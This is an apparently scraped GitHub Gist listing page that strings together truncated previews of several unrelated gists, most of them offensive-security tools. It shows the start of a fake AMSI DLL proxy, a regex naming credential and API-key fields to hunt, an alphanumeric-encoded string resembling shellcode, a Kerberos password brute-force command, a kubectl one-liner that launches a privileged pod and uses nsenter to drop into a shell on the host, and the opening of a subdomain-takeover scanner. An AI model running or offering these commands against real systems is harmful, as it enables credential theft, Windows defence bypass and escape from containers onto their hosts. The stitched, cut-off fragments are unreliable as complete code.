Goals: Add links that are reasonable and good explanations of how stuff works. No hype and no vendor content if possible. Practical first-hand accounts of models in prod eagerly sought.
Ivan Marković Ivan-Markovic
eversinc33
/ fakeAmsiDll.cpp
Created
June 6, 2023 17:36
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // dllmain.cpp : Defines the entry point for the DLL application. | |
| #include "pch.h" | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #define _CRT_SECURE_NO_DEPRECATE | |
| #pragma warning (disable : 4996) | |
| // generated with sharpdllproxy. |
h4x0r-dz
/ Generic keys
Created
May 5, 2022 09:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
nil0x42's tips & tricks
- Scrape twitter account of all github followers of target user on GitHub
- Scrape twitter account of all stargazers of target project on GitHub
erikig
/ common-domain-prefix-suffix-list.tsv
Last active
March 5, 2026 02:31
Top 5000 Most Common Domain Prefix/Suffix List - Courtesy LeanDomainSearch - https://leandomainsearch.com/top-domain-name-prefixes-and-suffixes/, Google Sheets version with changes to domain length - https://docs.google.com/spreadsheets/d/1BzZJ7BNek7ssUB2hWc6ChdF-mxN7QOE4U380Qx8uvR8/edit#gid=1626652908
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Rank | Type | Prefix/Suffix | Length | |
|---|---|---|---|---|
| 1 | Prefix | my+ | 2 | |
| 2 | Suffix | +online | 6 | |
| 3 | Prefix | the+ | 3 | |
| 4 | Suffix | +web | 3 | |
| 5 | Suffix | +media | 5 | |
| 6 | Prefix | web+ | 3 | |
| 7 | Suffix | +world | 5 | |
| 8 | Suffix | +net | 3 | |
| 9 | Prefix | go+ | 2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 5 c at 5 b at jut Yet At At At At At At At At At At At At Pt Pt jut jut jut jut Qt jut at 111 1 t t t t t t t t t t t t t t t t Pt Pt Pt Pt jut j j j j at Bet At j Qt Rt St j j j j at 4 Kt Qt Qt Rt St j j Pt j at 311 1 t t 321 1 111 1 Bet Bet At t Qt Yet u h a a a a Q X 4 y P Y I I I I I I I I I I I I I I I I I 7 Q Z j A X P 0 A 0 A k A A Q 2 A B 2 B B 0 B B A B X P 8 A B u J I 4 q Y P M I F 0 u 8 V O v O 3 C 5 8 U 8 T o P b b I 2 N l I i s R p q C K 9 y q N P d K z m m P A A X X X X X X X X X X X X X |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| kubectl run hack1 --restart=Never -t -i -n kube-system --image overridden --overrides '{"spec":{"hostPID": true, "containers":[{"name":"busybox","image":"alpine:3.7","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}' --rm --attach |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Usage : ./scanio.sh <save file> | |
| # Example: ./scanio.sh cname_list.txt | |
| # Premium | |
| function ech() { | |
| spinner=( "|" "/" "-" "\\" ) | |
| while true; do | |
| for i in ${spinner[@]}; do | |
| echo -ne "\r[$i] $1" |
NewerOlder